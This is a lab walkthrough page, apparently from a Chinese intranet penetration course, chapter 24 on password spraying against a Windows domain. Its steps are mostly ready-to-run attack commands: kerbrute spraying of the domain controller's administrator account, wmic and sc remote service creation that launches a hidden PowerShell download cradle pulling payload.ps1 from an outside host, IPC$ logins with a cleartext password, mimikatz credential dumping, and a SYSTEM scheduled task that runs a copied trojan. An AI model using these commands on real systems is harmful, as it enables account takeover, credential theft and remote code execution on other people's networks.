内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
24用户枚举与喷洒-实验
通过喷洒控制域内主机 工作组用户查找administrator或者普通管理员,域内用户查找administrator或者普通域内管理员。 ## 工作组喷洒域内主机上线 已经控制一台工作组机器,需要上线域控 > 前提条件 - 明确域控IP地址 - 明确域名 - 域内用户(需要枚举) > 操作 前提条件: - 已控制一台工作组机器 192.168.110.7 - 域控的IP地址为 192.168.110.5 - 域名为xbxaq.com 域控的账户名一般为administrator 1、进行密码喷洒(单用户多密码),将工具上传到192.168.110.7机器中 ``` shell kerbrute.exe bruteuser --dc 192.168.110.5 -d xbxaq.com pw.txt administrator ```  得到域控账户的密码,知道了明文密码直接进行横向 2、使用wmic进行横向 ``` shell wmic /node:192.168.110.5 /user:administrator /password:a1b2c3.. process call create "powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient).downloadstring('http://192.168.110.1:8000/payload.ps1'))\"" ```  3、上线成功  ## 域内主机喷洒域控上线 已经控制一台域内主机,需要上线域控 > 前提条件 - 明确域控IP地址 - 明确域名 - 域内用户(不需要进行枚举) > 操作 前提条件: - 已控制一台工作组机器 192.168.110.7(高权限用户) - 域控的IP地址为 192.168.110.5 - 域名为xbxaq.com 1、使用net user /domain查询域内有哪些用户  2、进行密码喷洒(单用户多密码),将工具上传到192.168.110.7机器中 ``` shell kerbrute.exe bruteuser --dc 192.168.110.5 -d xbxaq.com pw.txt administrator ```  得到域控账户的密码,知道了明文密码直接进行横向 3、使用IPC$配合服务上线 IPC$ ``` net use \\192.168.110.5\IPC$ "a1b2c3.." /user:"administrator" ```  使用CS生成的PS脚本 ``` sc \\192.168.110.5 create test binpath= "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient).downloadstring('http://192.168.110.1:8000/payload.ps1'))\"" sc \\192.168.110.5 start test ```  上线成功  ## 工作组之间进行上线 工作组只能使用IPC、明文密码或者PTH认证 已经控制一台工作组机器,需要上线另外一台工作组机器 > 前提条件 - 明确工作组机器的IP地址 > 操作 目前条件为已控制192.168.110.7机器,且机器用户为administrator,目标IP地址为192.168.110.8 1、既然在同一个域内,首先抓取192.168.110.7机器用户的账号密码,使用mimikatz工具   获取到明文密码a1b2c3..,然后使用wmic进行CS上线 2、也可以使用IPC$配合计划任务进行上线 当两台机器的用户名和密码是相同时,可以直接使用dir  copy木马到对方的机器中  创建计划任务并启动任务 ``` schtasks /create /s 192.168.110.8 /tn cs /tr c:/muma.exe /sc onstart /RU System /F #创建计划任务 schtasks /run /s 192.168.110.8 /u administrator /p a1b2c3.. /i /tn "cs" #启动任务 ```  上线成功 
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码